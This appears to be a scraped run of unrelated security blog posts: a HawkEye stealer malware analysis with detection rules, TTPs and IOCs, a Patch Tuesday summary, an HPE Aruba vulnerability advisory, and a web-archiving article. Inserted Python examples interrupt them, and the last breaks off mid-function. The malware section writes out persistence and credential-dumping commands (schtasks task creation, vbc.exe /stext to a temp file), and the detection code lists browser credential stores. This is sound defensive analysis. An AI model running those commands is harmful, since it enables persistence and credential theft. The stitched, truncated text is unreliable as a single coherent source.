It has also been used to target websites of portals typically accessed by companies, which were the main targets of the attacking groups. Another common method of spreading HawkEye was through “free” software, which turned out to be malware in disguise.

HawkEye’s delivery methods are quite diverse compared to other malware. However, its execution and behavior have remained relatively consistent over the years. A behavior graph of what has been observed in recent months would look as follows:

HawkEye graph

During the analysis process, I typically spend weeks, even months, collecting samples to understand how they function as a whole based on the existing variants. Therefore, we may observe variations among those presented. In most executions, we encounter enormous trees of processes based on their activities.

To simplify, as you’ve seen in the previous graph, it’s not as complex compared to other stealers or RATs. It generally consists of an executable that drops others in temporary paths, then injects code into one of them or into a .NET-related software. Later, in memory, it gathers all possible data and sends it to a C&C.

ProcDOT detonation chart

Going straight to the point, in an initial execution of one of the samples I analyzed, we see a rather extensive process—a succession of execution copies launched in temporary paths.

Process Tree execution (Image 1)
Process Tree execution (Image 2)

In this instance, they used the Roaming\Templates path, but this is highly variable depending on who created it. Generally speaking, they tend to abuse paths like AppData\Roaming and AppData\Local\Temp, which are classic choices.

Paths commonly abused (Image 1)
Paths commonly abused (Image 2)
Paths commonly abused (Image 3)

Here’s the list of paths observed for dropping files:

  • C:\Users\<user>\AppData\Local\Temp
  • C:\Users\<user>\AppData\Roaming
  • C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Templates
  • C:\Users\<user>\AppData\Local\Temp\System
  • C:\Users\<user>\Music

All of the files launched in the previous step are copies of the original binary. The filenames are also highly variable, as you might expect, but they often carry an icon that makes the victim think it's a legitimate program, or the file description is altered to make it look like legitimate software.

Ultimately, after comparing the dropped files, we can see they are simple copies of the original, with the particularity that some versions write them with the hidden attribute set, so they are not visible unless "Show hidden files" is enabled in Windows Explorer.

Hidden files duplication graph

During these file droppings, we can encounter both replicas of the original file in different paths, as well as support files whose functionality is typically to establish persistence (or check if it’s already done, and if not, do it) and to perform injector functions, which is a characteristic of this malware. In this case, the smaller binary is responsible for these actions.

Injector written in temporary folder

I check to see if there is any shared information between the two binaries and notice that certain parts of the code match the original. This will become relevant later, as right now we’re seeing them separately, but everything will make sense afterward.

Comparison of the injector and the Hawkeye bin

After this step, we can see how persistence is established. HawkEye (also known as Predator Pain) isn't malware that establishes persistence only once: it has been observed checking and establishing persistence up to three separate times, depending on the phase (Loader > Injector > Payload).

This makes it clear that the malware is determined to persist on the system, one way or another. At this stage, to avoid revealing persistence mechanisms through strings, it obfuscates a string and then decodes it to introduce, in this case, one of the binaries launched earlier. This practice isn’t as common and adds a level of sophistication not found in other samples.

Hawkeye persistence in registers

Not only does it create persistence in the registry, but we also find samples that establish persistence in tasks using commands like the following:

schtasks.exe /Create /TN "<Path>\<TaskName>" /XML "<File>"

After observing its behavior in the early stages, we follow the entire execution thread with a debugger. I've followed several samples, and they're mostly similar: .NET assemblies, sometimes obfuscated with tools like ConfuserEx, Eazfuscator.NET, .NET Reactor, or similar, which are relatively easy to deobfuscate.

Hawkeye code obfuscated

In most samples, I noticed heavy interaction with resources, which will become crucial shortly since I observed a significant amount of data in these resources across most of the samples I found.

Resources data content (Image 1)
Resources data content (Image 2)

In the malware’s initial phases, it looks for the running process (which will be the previously prepared copy), where it will check the PID to access the resources. Within these resources, we see two distinct types of code: the initial part, which acts as a key, and the data chunk, which is what will be deobfuscated. To achieve this, it uses XOR + Poly, and at the end of the process, it extracts a Portable Executable.

Graph of binary load from resources

It can do this in various ways depending on the sample, but we see the same extraction of a binary from a resource as we do from obfuscated code in memory, like the example shown below.

Graph of PE extraction from memory

The result of this phase is two extracted files—one will be the injector, and the other will be the Keylogger.

Extracted Injector
Extracted Keylogger

I compared both files, and they’re entirely different, in size, in structure—the only common factor is that both are .NET binaries.

Binary comparison

To highlight the difference between the injector dropped on disk (Right) and the one extracted from memory (Left), we can compare the extended content. We can observe how the memory-extracted injector includes imports related to injection that the disk version doesn’t (such as ZwUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory, etc.).

Extracted and dropped injector comparison
Extracted and dropped injector comparison

Here we can observe various functionalities while extracting the binaries, such as self-deletion. This is done to maintain evasion and avoid revealing its location, as it drops replicas of the original binary in various locations, as we saw earlier.

Self-deletion and self-copy of the original binary (Image 1)

Self-deletion and self-copy of the original binary (Image 2)
Self-deletion and self-copy of the original binary (Image 3)
Self-deletion and self-copy of the original binary (Image 4)

One of the dropped files, the smaller one, acts as the injector. When extracted from memory, it has more functionalities than the one seen on disk. This is because the injection tasks are carried out during runtime, but the written file is actually a portion of this, triggering the main binary located in the temporary path.

It checks persistence and restarts the entire process, including injection. Therefore, it’s a part of the file without revealing all of its functionalities. I’ll show you how it performs injection using Process Hollowing.

Graph of the process injection

In essence, the injector doesn’t have much more functionality. It includes a phase where it checks running processes, which is an interesting technique to detect analysis tools or to determine if the process is already running. If not, it launches the process, adds it to the registry (as seen earlier), and restarts the execution.

Process collection routine (Image 1)
Process collection routine (Image 2)
Process collection routine (Image 3)

Lastly, we only have the second extraction left to observe, which is HawkEye itself. I’ve encountered many versions of it, as the modules included will vary significantly based on what the creator configures in the builder of the Keylogger itself.

We’ll talk more about this later, but you can see all the functionalities that can be added during its creation, which will impact the modules incorporated into it.

Comparison between crack and extracted keylogger features (Image 1)
Comparison between crack and extracted keylogger features (Image 2)

At this point, I conducted tests with several builders to verify this theory, as I had extracted multiple samples to the final phase, and almost none of them resembled each other too much. I tested by removing or adding options, and even with the same sample, there were significant differences, so you can imagine how different it can be if it’s not exactly the same version of the keylogger and different elements were selected during its creation.

Comparison between crack and extracted keylogger

At this stage, we just need to examine the payload’s functionalities. Upon first glance, we can see strings that reveal its nature—this sample didn’t expect anyone to reach this point, as it has three well-defined phases that conceal its tracks, but here we can see many indicators of what it is.


Overview of the extracted HawkEye (Image 1)
Overview of the extracted HawkEye (Image 2)

During the execution of this specific module, we can observe it invoking vbc.exe as it injects the payload into this process, using the same techniques we’ve previously seen.

Execution of HawkEye’s final stage (Image 1)
Execution of HawkEye’s final stage (Image 2)
Execution of HawkEye’s final stage (Image 3)

Regarding the modules it brings, I compared three different samples, and they are quite similar in terms of what they can do. The general functionalities that typically match include:

  • Keylogging (Monitoring and stealing keyboard and clipboard data)
  • System information gathering (OS, HW, Network)
  • Credential theft (Mail, FTP, browsers, video games, etc.)
  • Wallet theft
  • Screenshot capture
  • Security software detection
  • Analysis tools detection (Dbg, traffic, etc.)
  • Persistence (usually via registry keys or Tasks)
  • Information exfiltration through various methods (FTP, HTTP, SMTP, etc.)

Graph of payload module diffing

Calling HawkEye a keylogger is really an oversimplification, as it performs more functions than many stealers I’ve seen. Once injected into vbc.exe or other processes, it carries out various actions mentioned above.

Graph of HawkEye functionality

Outro

As we discussed earlier, different groups have used this keylogger, as well as independent criminals or even script kiddies. In my research, I found different places where this keylogger was sold—there were up to 4-5 different sites, as it changed developers and domains over time, which is quite common.

HawkEye webpage

It has also been distributed as cracked builds, sold or offered to forum members outside the official subscription or marketplaces, for far less than the standard price, which as mentioned earlier ranged from $20 to $50.

HawkEye product sales

It's always important with these kinds of tools to obtain the original software in different versions, to understand how it works from both the victim's and the attacker's perspectives and get a complete view of the malware.

Here, we can see that the builder provides a multitude of configuration options, allowing us to choose where to send the stolen information (email, FTP, etc.), what we want to collect (browser info, FTP credentials, mail, etc.), whether to check for certain tools, establish persistence, delete data, download from a domain (this could function as a downloader for other malware), change the payload data to make it appear like legitimate software (e.g., changing the icon, description, etc.). As you can see, it’s incredibly comprehensive. After compiling, we’ll have our complete Keylogger, Stealer, or Downloader (call it what you will, as it does everything) ready to use.

Graph of HawkEye builder

I don’t want to repeat myself too much, but when comparing the versions we’ve seen and extracted with the ones we created ourselves, they function exactly the same—same injections, persistence, data theft (or whatever was chosen in the builder). Therefore, in telemetry, we won’t find any surprises, as you can see below.

Graph of the built HawkEye's execution

After analyzing all of this, I hope you are as impressed as I am by the sheer versatility and longevity HawkEye has displayed over the years. It's truly a tremendously powerful and easy-to-use tool that, unfortunately, we will continue to see in security incidents from actors of all types.

Finally, I would like to thank you for reading this analysis and for supporting me.

Detection Opportunities

[TA0005][T1036] Duplication of original files in temporary paths

  • (WriteFile) C:\Users\<user>\AppData\Local\Temp\*.exe
  • (WriteFile) C:\Users\<user>\AppData\Roaming\*.exe
  • (WriteFile) C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Templates\*.exe
  • (WriteFile) C:\Users\<user>\AppData\Local\Temp\System\*.exe
  • (WriteFile) C:\Users\<user>\Music\*.exe

[TA0003][T1053] Scheduled Task persistence

  • schtasks.exe /Create /TN "<Path>\<TaskName>" /XML "<TempPath>\<File>"

[TA0003][T1547.001] Registry Run Keys persistence

  • (Registry) HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  • (ValueData) <Path Used on [TA0005][T1036] Duplication of original files in temporary paths>

[TA0005][T1055.012] Process injection on vbc or itself

  • From file in temporary folder > injection > vbc.exe 
  • From file in temporary folder > injection > Other unidentified file in same temporary path

[TA0009][T1074.001] Save stolen info on txt files

  • vbc.exe /stext "*\AppData\Local\Temp\holdermail.txt"

[TA0009][T1113] Saving screenshots of the victim’s screen

  • (WriteFile / Regex NameFile) screenshot\d{1}.jpeg

[TA0006][T1555] Queries to browser paths or third-party software to obtain user account information

  • (Registry/Path query) Web Data | Login Data | Accounts | Profiles | Cookies\index.dat | profiles.ini | *.oeaccount
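The detection opportunities above translate almost directly into rules over endpoint telemetry. The following Python is an added example (not ANY.RUN's code and not from the original post) that encodes them as predicates over a simplified, constructed event schema (file writes, process creations, registry sets and path queries), then runs them over a handful of made-up events. The `Event` fields, the user-name wildcard and the benign noise events are this example's assumptions; adapt the field mapping to whatever your EDR or Sysmon pipeline emits.

```python
import re
from dataclasses import dataclass

# Staging directories from the detection opportunities above, as regex
# prefixes. "<user>" becomes a wildcard for the profile name.
STAGING_DIRS = [
    r"C:\\Users\\[^\\]+\\AppData\\Local\\Temp\\",
    r"C:\\Users\\[^\\]+\\AppData\\Roaming\\",
    r"C:\\Users\\[^\\]+\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\",
    r"C:\\Users\\[^\\]+\\AppData\\Local\\Temp\\System\\",
    r"C:\\Users\\[^\\]+\\Music\\",
]
ANY_STAGING = "(?:" + "|".join(STAGING_DIRS) + ")"

# An .exe written directly into one of the staging directories.
EXE_IN_STAGING = re.compile(r"^" + ANY_STAGING + r"[^\\]+\.exe$", re.IGNORECASE)
# Any path that starts inside a staging directory.
IN_STAGING = re.compile(r"^" + ANY_STAGING, re.IGNORECASE)
# schtasks /Create ... /XML <file>; group(1) is the XML path.
SCHTASKS_XML = re.compile(r'schtasks(?:\.exe)?\s+/create\b.*\s/xml\s+"?([^"\s]+)', re.IGNORECASE)
RUN_KEY = re.compile(
    r"^(?:HKEY_CURRENT_USER|HKCU)\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run$",
    re.IGNORECASE)
# vbc.exe /stext <...>\AppData\Local\Temp\holder*.txt (credential dump to disk).
STEXT_DUMP = re.compile(r'vbc(?:\.exe)?\s+/stext\s+"?[^"]*\\AppData\\Local\\Temp\\holder\w*\.txt', re.IGNORECASE)
SCREENSHOT = re.compile(r"(?:^|\\)screenshot\d{1}\.jpeg$", re.IGNORECASE)
CRED_STORES = re.compile(
    r"\\Web Data$|\\Login Data$|\\Accounts(?:\\|$)|\\Profiles(?:\\|$)|"
    r"\\Cookies\\index\.dat$|\\profiles\.ini$|\.oeaccount$",
    re.IGNORECASE)


@dataclass
class Event:
    """Assumed minimal telemetry record (this example's own schema)."""
    kind: str      # file_write | file_query | process | registry_set | registry_query
    process: str   # image name of the acting process
    target: str    # path written/queried, command line, or registry value data
    key: str = ""  # registry key for registry_* events


def exe_dropped(ev):
    return ev.kind == "file_write" and bool(EXE_IN_STAGING.match(ev.target))

def schtasks_from_staging(ev):
    if ev.kind != "process":
        return False
    m = SCHTASKS_XML.search(ev.target)
    return bool(m) and bool(IN_STAGING.match(m.group(1)))

def run_key_to_staging(ev):
    return (ev.kind == "registry_set" and bool(RUN_KEY.match(ev.key))
            and bool(IN_STAGING.match(ev.target.strip('"'))))

def stext_dump(ev):
    return ev.kind == "process" and bool(STEXT_DUMP.search(ev.target))

def screenshot_written(ev):
    return ev.kind == "file_write" and bool(SCREENSHOT.search(ev.target))

def cred_store_queried(ev):
    return ev.kind in ("file_query", "registry_query") and bool(CRED_STORES.search(ev.target))

RULES = [
    ("exe_dropped_in_staging_dir", "T1036", exe_dropped),
    ("schtasks_xml_from_staging_dir", "T1053", schtasks_from_staging),
    ("run_key_points_to_staging_dir", "T1547.001", run_key_to_staging),
    ("stext_dump_to_holder_txt", "T1074.001", stext_dump),
    ("screenshot_jpeg_written", "T1113", screenshot_written),
    ("credential_store_queried", "T1555", cred_store_queried),
]

def scan(events):
    """Return (event index, rule name, ATT&CK technique) for every rule that fires."""
    hits = []
    for i, ev in enumerate(events):
        for name, technique, pred in RULES:
            if pred(ev):
                hits.append((i, name, technique))
    return hits

# Constructed sample telemetry (not real logs). Events 0-6 mimic the chain
# described above; events 7-9 are benign noise that must not fire.
SAMPLE_EVENTS = [
    Event("file_write", "invoice.exe", r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Templates\svchost.exe"),
    Event("file_write", "invoice.exe", r"C:\Users\alice\AppData\Local\Temp\System\update.exe"),
    Event("process", "svchost.exe", r'schtasks.exe /Create /TN "Updater\Run" /XML "C:\Users\alice\AppData\Local\Temp\task.xml"'),
    Event("registry_set", "update.exe", r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Templates\svchost.exe",
          key=r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"),
    Event("process", "svchost.exe", r'vbc.exe /stext "C:\Users\alice\AppData\Local\Temp\holdermail.txt"'),
    Event("file_write", "vbc.exe", r"C:\Users\alice\AppData\Local\Temp\screenshot3.jpeg"),
    Event("file_query", "vbc.exe", r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    Event("file_write", "msiexec.exe", r"C:\Program Files\App\app.exe"),
    Event("file_write", "explorer.exe", r"C:\Users\alice\Music\song.mp3"),
    Event("process", "svchost.exe", r'schtasks.exe /Create /TN "Backup" /XML "C:\ProgramData\Backup\task.xml"'),
]

if __name__ == "__main__":
    for i, name, technique in scan(SAMPLE_EVENTS):
        print(f"[{technique}] {name}: {SAMPLE_EVENTS[i].process} -> {SAMPLE_EVENTS[i].target}")
```

Each rule on its own is noisy (installers write executables to Temp all day); the signal comes from several of them firing for the same process tree within a short window, which is how you would chain them in a correlation rule.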

TTPs

[TA0001][T1566.001] SpearPhishing

[TA0002][T1204] User Execution

[TA0003][T1053] Scheduled Task/Job

[TA0003][T1547.001] Registry Run Keys / Startup Folder

[TA0005][T1112] Modify Registry

[TA0005][T1564.001] Hidden Files and Directories

[TA0005][T1055] Process Injection

[TA0005][T1562] Impair Defenses

[TA0005][T1027] Obfuscated Files or Information

[TA0005][T1140] Deobfuscate/Decode Files or Information

[TA0005][T1036] Masquerading

[TA0005][T1497] Virtualization/Sandbox Evasion

[TA0006][T1552] Unsecured Credentials

[TA0006][T1555] Credentials from Password Stores

[TA0007][T1087] Account Discovery

[TA0007][T1518.001] Security Software Discovery

[TA0007][T1033] System Owner/User Discovery

[TA0007][T1012] Query Registry

[TA0007][T1016] System Network Configuration Discovery

[TA0007][T1518] Software Discovery

[TA0007][T1082] System Information Discovery

[TA0009][T1074.001] Local Data Staging

[TA0009][T1005] Data from Local System

[TA0009][T1560] Archive Collected Data

[TA0009][T1114] Email Collection

[TA0009][T1115] Clipboard Data

[TA0009][T1113] Screen Capture

[TA0011][T1105] Ingress Tool Transfer

[TA0011][T1071] Application Layer Protocol

[TA0011][T1571] Non-Standard Port

[TA0042][T1583.008] Malvertising

IOCs

60fabd1a2509b59831876d5e2aa71a6b

defc51f31f6c4fa89cc6a39a62d8a08f

dea59d578e0e64728780fb67dde7d96d

040058f70ffdee6398f7b64ae1ea46d3

e651dca5c850451cdba7f25cbb4134e7

de823ba5d67de8682e6d7b8b472dbbcb

25a2d98dfcf6a12ea6459882c56aa2e0

179b219afa2ac15b14affd399273148b

38a3cb547a0a19a61534792f572f08b0

addcd85e0126e63e46da09eb8ea97120

0a2f6501a36c1b13532139e3c1843109

06916c9505da82f63a73768c6f336192

ab264deb2563dc4df8b281b18e0861ba

66[.]147[.]236[.]46

204[.]141[.]42[.]56

129[.]204[.]194[.]84

The post HawkEye Malware: Technical Analysis appeared first on ANY.RUN’s Cybersecurity Blog.

November Patch Tuesday release contains three critical remote code execution vulnerabilities

The Patch Tuesday for November of 2024 includes 89 vulnerabilities, including four that Microsoft marked as “critical.” The remaining vulnerabilities listed are classified as “important.”

Microsoft assessed that exploitation of the four “critical” vulnerabilities is “less likely.”

CVE-2024-43639 is a remote code execution vulnerability in Windows Kerberos. An unauthenticated attacker could exploit it with a specially crafted application that leverages a flaw in a cryptographic protocol. Although rated "critical," exploitation was assessed as "less likely," and it has not been detected in the wild.

CVE-2024-43625 is an elevation of privilege vulnerability in the VMSwitch driver, a networking component of Hyper-V. An attacker could exploit it by sending a specific series of network packets to the driver to trigger a use-after-free in the Hyper-V host, allowing arbitrary code execution with elevated privileges. Although classified as "critical," exploitation was deemed "less likely" and the attack complexity "high." Microsoft has not detected active exploitation of this vulnerability in the wild.

CVE-2024-43602 is a remote code execution vulnerability in Azure CycleCloud. Although marked as "critical," Microsoft has determined that exploitation is "less likely." An attacker who has gained basic user privileges may be able to exploit it by sending specially crafted requests to the Azure CycleCloud cluster to gain root privileges. Microsoft has not detected active exploitation of this vulnerability in the wild.

CVE-2024-43498 is a “critical” remote code execution vulnerability in .NET and Visual Studio. Microsoft has assessed exploitation of this vulnerability as “less likely.” A remote attacker could exploit a vulnerable .NET web app by sending specially crafted packets, or loading a specially crafted file into a vulnerable application. In the wild exploitation of this vulnerability has not been detected by Microsoft.

Of the vulnerabilities included in the release, several “important” updates were listed as “exploitation more likely”. These updates are listed below:

  • CVE-2024-49033 – Microsoft Word Security Feature Bypass Vulnerability
  • CVE-2024-43623 – Windows NT OS Kernel Elevation of Privilege Vulnerability
  • CVE-2024-43629 – Windows DWM Core Library Elevation of Privilege Vulnerability
  • CVE-2024-43630 – Windows Kernel Elevation of Privilege Vulnerability
  • CVE-2024-43636 – Win32k Elevation of Privilege Vulnerability
  • CVE-2024-49019 – Active Directory Certificate Services Elevation of Privilege Vulnerability
  • CVE-2024-43642 – Windows SMB Denial of Service Vulnerability

Additionally, Talos would like to highlight the following “important” vulnerabilities as exploitation has been detected by Microsoft:

  • CVE-2024-43451 – NTLM Hash Disclosure Spoofing Vulnerability
  • CVE-2024-49039 – Windows Task Scheduler Elevation of Privilege Vulnerability

A complete list of all the other vulnerabilities Microsoft disclosed this month is available on its update page. In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Secure Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

The rules included in this release that protect against the exploitation of many of these vulnerabilities are 62022, 62023, 64218-64224, 64229, 64232 and 64233. There are also Snort 3 rules 301064, 300612, 301065, 301066 and 301073.

Source: Cisco Talos Blog

HPE Aruba Access Points have Critical Command Injection Vulnerabilities

Overview

Hewlett Packard Enterprise (HPE) Aruba Networking has identified multiple critical security vulnerabilities affecting its Access Points running Instant AOS-8 and AOS-10.

The vulnerabilities, tracked under several CVEs including CVE-2024-42509 and CVE-2024-47460, could allow unauthenticated attackers to remotely execute commands on the device, potentially compromising the underlying operating system. HPE has issued patches to address these issues, and users are urged to upgrade as soon as possible.

These vulnerabilities impact widely deployed HPE Aruba Access Points and pose significant risks to network security, with certain devices remaining unpatched due to their end-of-maintenance (EoM) status.

Vulnerabilities Summary

  • Advisory ID: HPESBNW04722
  • CVE IDs:
    • CVE-2024-42509
    • CVE-2024-47460
    • CVE-2024-47461
    • CVE-2024-47462
    • CVE-2024-47463
    • CVE-2024-47464

  • Severity: Critical to Medium
  • Affected Software Versions:
    • AOS-10.4.x.x: Versions up to 10.4.1.4
    • Instant AOS-8.12.x.x: Versions up to 8.12.0.2
    • Instant AOS-8.10.x.x: Versions up to 8.10.0.13

  • Unaffected Products: HPE Aruba Mobility Conductor, Mobility Controllers, SD-WAN Gateways, and InstantOn Access Points

Detailed Breakdown of Vulnerabilities

  1. CVE-2024-42509: Unauthenticated Command Injection via PAPI Protocol
    • Impact: Allows unauthenticated remote attackers to execute arbitrary commands as a privileged user via specially crafted packets sent to Aruba’s PAPI (UDP port 8211).
    • Severity: Critical (CVSS 9.8)
    • Mitigation: For Instant AOS-8, enabling cluster security via the cluster-security command can prevent exploitation. For AOS-10 devices, network administrators should block UDP/8211 from untrusted networks.

  2. CVE-2024-47460: Command Injection via CLI Service through PAPI Protocol
    • Impact: Similar to CVE-2024-42509, this vulnerability allows command injection by sending packets to the PAPI protocol, leading to unauthorized command execution.
    • Severity: Critical (CVSS 9.0)
    • Mitigation: Enabling cluster security for Instant AOS-8 or restricting access to UDP/8211 for AOS-10.

  3. CVE-2024-47461: Authenticated Remote Command Execution (RCE)
    • Impact: An authenticated attacker could execute commands with elevated privileges on affected devices, compromising the underlying OS.
    • Severity: High (CVSS 7.2)
    • Mitigation: Restrict CLI and web-based management to a dedicated VLAN and firewall policies to limit access.

  4. CVE-2024-47462 and CVE-2024-47463: Authenticated Arbitrary File Creation Leading to RCE
    • Impact: Authenticated attackers can create arbitrary files, potentially leading to remote code execution.
    • Severity: High (CVSS 7.2)
    • Mitigation: Limit access to the CLI and web-based management interfaces as described for CVE-2024-47461.

  5. CVE-2024-47464: Authenticated Path Traversal
    • Impact: Allows attackers with valid credentials to copy arbitrary files to a readable location, leading to potential unauthorized access to sensitive files.
    • Severity: Medium (CVSS 6.8)
    • Mitigation: Restrict access to management interfaces to secure segments and implement firewall policies.

Mitigations and Recommendations

HPE Aruba has released patches for the impacted AOS-8 and AOS-10 versions to mitigate these vulnerabilities. Users should upgrade to the latest available versions immediately to secure their systems:

  • AOS-10.7.x.x: 10.7.0.0 and above
  • AOS-10.4.x.x: 10.4.1.5 and above
  • Instant AOS-8.12.x.x: 8.12.0.3 and above
  • Instant AOS-8.10.x.x: 8.10.0.14 and above

Additional Recommendations:

  • Enable Cluster Security: For AOS-8 devices, enabling cluster security via the cluster-security command can effectively mitigate certain command injection vulnerabilities.
  • Restrict Access to Management Ports: For AOS-10 devices, block PAPI protocol (UDP port 8211) from untrusted networks to limit potential attack vectors.
  • Network Segmentation: Segregate management interfaces on a dedicated VLAN and enforce strict access control policies using firewall rules.
  • Regular Monitoring: Conduct regular vulnerability assessments and monitor system logs for unusual activity.

Devices Not Receiving Patches

Some affected software versions have reached their end-of-maintenance (EoM) status and will not receive updates. This includes versions AOS-10.3.x.x and below, as well as Instant AOS-8.11.x.x and older.

For these devices, HPE recommends isolating them from untrusted networks or replacing them with supported models.
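Checking an estate of access points against the version tables above is the first practical step. The following Python is an added example (not HPE's or Cyble's code) that classifies each device's firmware as patched, vulnerable, end-of-maintenance or on a branch the advisory summary does not cover. The inventory and hostnames are constructed; the branch thresholds are this example's reading of the summary above and should be checked against HPESBNW04722 itself before you act on them.

```python
# Fixed builds per (major, minor) branch, transcribed from the summary above.
FIXED_BUILD = {
    (10, 7): (10, 7, 0, 0),
    (10, 4): (10, 4, 1, 5),
    (8, 12): (8, 12, 0, 3),
    (8, 10): (8, 10, 0, 14),
}

def parse_version(text):
    """'10.4.1.4' -> (10, 4, 1, 4); rejects anything that is not four integers."""
    parts = text.strip().split(".")
    if len(parts) != 4 or not all(p.isdigit() for p in parts):
        raise ValueError(f"not an AOS version string: {text!r}")
    return tuple(int(p) for p in parts)

def is_end_of_maintenance(version):
    """AOS-10.3.x.x and below, and Instant AOS-8.11.x.x and older, get no fix.
    The supported 8.10 and 8.12 branches are excluded first."""
    major, minor = version[0], version[1]
    if (major, minor) in FIXED_BUILD:
        return False
    if major == 10:
        return minor <= 3
    if major == 8:
        return minor <= 11
    return major < 8

def classify(text):
    """Return (status, detail); status is 'patched', 'vulnerable',
    'end_of_maintenance' or 'unknown_branch'."""
    version = parse_version(text)
    branch = (version[0], version[1])
    if branch in FIXED_BUILD:
        fixed = FIXED_BUILD[branch]
        if version >= fixed:            # tuple comparison, element by element
            return "patched", text
        return "vulnerable", "upgrade to " + ".".join(map(str, fixed))
    if is_end_of_maintenance(version):
        return "end_of_maintenance", "no fix available; isolate or replace"
    return "unknown_branch", "not covered by the advisory tables used here"

def audit(inventory):
    """inventory: {hostname: version string} -> {hostname: (status, detail)}."""
    return {host: classify(ver) for host, ver in inventory.items()}

# Constructed inventory for the demonstration (not real devices).
SAMPLE_INVENTORY = {
    "ap-lobby-01": "10.4.1.4",
    "ap-lobby-02": "10.4.1.5",
    "ap-lab-01": "8.12.0.2",
    "ap-lab-02": "8.10.0.14",
    "ap-warehouse-01": "8.11.2.3",
    "ap-old-01": "10.3.1.0",
    "ap-new-01": "10.7.0.0",
}

if __name__ == "__main__":
    for host, (status, detail) in audit(SAMPLE_INVENTORY).items():
        print(f"{host:16} {SAMPLE_INVENTORY[host]:10} {status:20} {detail}")
```

Devices reported as end_of_maintenance are the ones the PAPI (UDP/8211) filtering and management-VLAN isolation above exist for, since no upgrade will close the hole.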

Conclusion

The critical vulnerabilities in HPE Aruba Networking’s Instant AOS-8 and AOS-10 software call for urgent patching. By promptly applying these updates and enforcing network access controls, organizations can significantly reduce the risk of unauthorized command execution and data breaches. For legacy devices beyond maintenance, adopting network isolation and considering device upgrades are key steps toward minimizing potential exposure.

Sources:

https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04722en_us&docLocale=en_US

The post HPE Aruba Access Points have Critical Command Injection Vulnerabilities appeared first on Cyble.

How to save web pages permanently or find content from deleted sites | Kaspersky official blog

Contrary to the popular belief that anything online stays online, the internet doesn’t remember everything. In a previous post in this series, we examined no fewer than nine scenarios in which you could lose access to online content. We also provided a detailed guide to what information you absolutely must (and preferably quickly) back up to your computer and how to do it. Today, we’ll discuss how to easily save web pages to your computer, how to organize these archives, and what to do if your favorite site has gone AWOL.

Let’s say you want to save a blog post with a recipe, compile a bibliography for your research paper, or even preserve a specific online publication for legal purposes. All of the above are published as web pages — which have a tendency to disappear at the wrong moment. Want to reminisce about music news and gossip from 2005? Good luck with that — the MTV News site shut down and all its articles and interviews are no longer available. Check references in Wikipedia articles? 11% of them lead nowhere, even though they were working when the article was published. This phenomenon of “link rot” — the gradual deletion or relocation of online content — is rapidly becoming a major problem. 38% of pages that existed ten years ago are no longer accessible today. So, if there’s a web page out there that you like or need, the wise move would be to create a backup.

How to save a web page to your computer

Since a web page consists of dozens or even hundreds of files, backing it up will require a bit of effort. Here are the main ways to do it:

Save only the HTML file. Select the "Save page as…" command or button in your browser and then choose "Webpage, HTML Only". This saves the page's HTML (its text and markup) but none of the images, styles or scripts.

Save text and images. The “Webpage, Complete” option will create, besides an HTML file, a folder with the same name containing all graphic elements, styles, and scripts from the page. A downside of this option is that saving a lot of auxiliary files clutters your drive. The “Webpage, Single File” option is more convenient, bundling the web page and all its resources into a single .mhtml file. This will open freely in Chrome or Edge, but other browsers may have issues. This option is not available in all browsers, but if you install the SingleFile extension (available for most browsers), you can save the entire web page and its media content as a single HTML file that opens perfectly fine in all modern browsers.

Print to PDF. To preserve the main content of the page, but scrap menus and banners, your best option is Print to PDF. The resulting file will open on any computer.

With any of these options, make sure that the main text that you actually want to keep is still readable when you open the document.
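To see what the "Webpage, Single File" option actually stores, here is an added Python example (not from the original post) that parses a small constructed .mhtml file with the standard library's email parser, lists its parts, and flags scripts and cross-origin resources. The point for a security-minded archivist: a saved page keeps its scripts, and they run again when you open the file, so it is worth knowing what you archived. The sample MHTML text and every URL in it are made up for the demonstration.

```python
import email
from email import policy
from urllib.parse import urlsplit

# Constructed sample of what "Webpage, Single File" produces: a MIME
# multipart/related container holding the HTML, one image and one script.
SAMPLE_MHTML = """MIME-Version: 1.0
Content-Type: multipart/related; type="text/html"; boundary="----=_MHT_BOUNDARY"
Snapshot-Content-Location: https://example.invalid/recipe
Subject: Pancakes (constructed sample)

------=_MHT_BOUNDARY
Content-Type: text/html; charset="utf-8"
Content-Transfer-Encoding: quoted-printable
Content-Location: https://example.invalid/recipe

<html><body><h1>Pancakes</h1><img src=3D"cid:img1"></body></html>
------=_MHT_BOUNDARY
Content-Type: image/png
Content-Transfer-Encoding: base64
Content-ID: <img1>
Content-Location: https://example.invalid/pancakes.png

iVBORw0KGgo=
------=_MHT_BOUNDARY
Content-Type: text/javascript
Content-Transfer-Encoding: 7bit
Content-Location: https://cdn.example.invalid/tracker.js

console.log("this still runs when the saved file is opened");
------=_MHT_BOUNDARY--
"""

SCRIPT_TYPES = {"text/javascript", "application/javascript", "application/x-javascript"}

def inventory(mhtml_text):
    """List every leaf part with its type, origin URL and decoded size, flagging
    scripts and resources that came from a host other than the page's own."""
    msg = email.message_from_string(mhtml_text, policy=policy.default)
    page_url = str(msg.get("Snapshot-Content-Location") or msg.get("Content-Location") or "")
    page_host = urlsplit(page_url).netloc
    parts = []
    for part in msg.walk():
        if part.is_multipart():          # skip the container itself
            continue
        ctype = part.get_content_type()
        location = str(part.get("Content-Location", ""))
        payload = part.get_payload(decode=True) or b""   # undoes base64 / quoted-printable
        parts.append({
            "type": ctype,
            "location": location,
            "size": len(payload),
            "is_script": ctype in SCRIPT_TYPES,
            "cross_origin": bool(location) and urlsplit(location).netloc != page_host,
        })
    return parts

def html_of(mhtml_text):
    """Return the decoded HTML part, i.e. the text you actually wanted to keep."""
    msg = email.message_from_string(mhtml_text, policy=policy.default)
    for part in msg.walk():
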